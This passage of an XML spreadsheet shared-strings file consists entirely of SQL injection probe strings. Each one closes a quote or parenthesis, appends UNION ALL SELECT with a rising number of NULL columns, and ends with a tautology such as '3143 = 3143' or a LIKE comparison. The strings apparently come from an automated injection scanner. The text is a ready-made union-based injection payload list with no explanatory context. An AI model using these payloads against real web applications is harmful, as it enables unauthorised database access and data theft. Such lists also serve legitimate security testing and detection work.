    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3143 = 3143</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1651 = 1651</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1005 = 1005</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3317 = 3317</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  2760 = 2760</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  6189 = 6189</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1573 = 1573</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  2258 = 2258</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  769 = 769</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  8040 = 8040</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  7703 = 7703</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 6680 = 6680</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4651 = 4651</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7168 = 7168</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 1982 = 1982</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5991 = 5991</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8996 = 8996</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 6810 = 6810</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5867 = 5867</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5038 = 5038</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8104 = 8104</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'EONP' = 'EONP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'rezW' = 'rezW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'JCjD' = 'JCjD</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'iUws' = 'iUws</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ruXc' = 'ruXc</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'pDIh' = 'pDIh</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'wrsb' = 'wrsb</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ZTQC' = 'ZTQC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'HBvF' = 'HBvF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'prtE' = 'prtE</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'jsOV' = 'jsOV</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'bYAg' = 'bYAg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'yryN' = 'yryN</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'wUsS' = 'wUsS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'vRJa' = 'vRJa</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'dKSg' = 'dKSg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'TFlG' = 'TFlG</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'gVVR' = 'gVVR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'czWI' = 'czWI</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'wbmS' = 'wbmS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Aeiu' = 'Aeiu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dQoC' = 'dQoC</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'uSnY' = 'uSnY</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'MzeX' = 'MzeX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'VPYh' = 'VPYh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Rhio' = 'Rhio</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'afmX' = 'afmX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'WuJv' = 'WuJv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'svYu' = 'svYu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'CgHo' = 'CgHo</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hnOn' = 'hnOn</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xVmP' = 'xVmP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'KByd' = 'KByd</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'RVOR' = 'RVOR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'icHZ' = 'icHZ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Olpp' = 'Olpp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'IirK' = 'IirK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'PfdY' = 'PfdY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'XSCA' = 'XSCA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'dPpa' = 'dPpa</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'mVys' LIKE 'mVys</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'bUVc' LIKE 'bUVc</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Qhjm' LIKE 'Qhjm</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'zViC' LIKE 'zViC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'TKgM' LIKE 'TKgM</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'uBJc' LIKE 'uBJc</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'XoxB' LIKE 'XoxB</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'IJqk' LIKE 'IJqk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'pfUB' LIKE 'pfUB</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'TdSU' LIKE 'TdSU</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'uwSm' LIKE 'uwSm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'OfmE' LIKE 'OfmE</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'dFzc' LIKE 'dFzc</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'AcIc' LIKE 'AcIc</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'uZDA' LIKE 'uZDA</t>
  </si>
  <si>
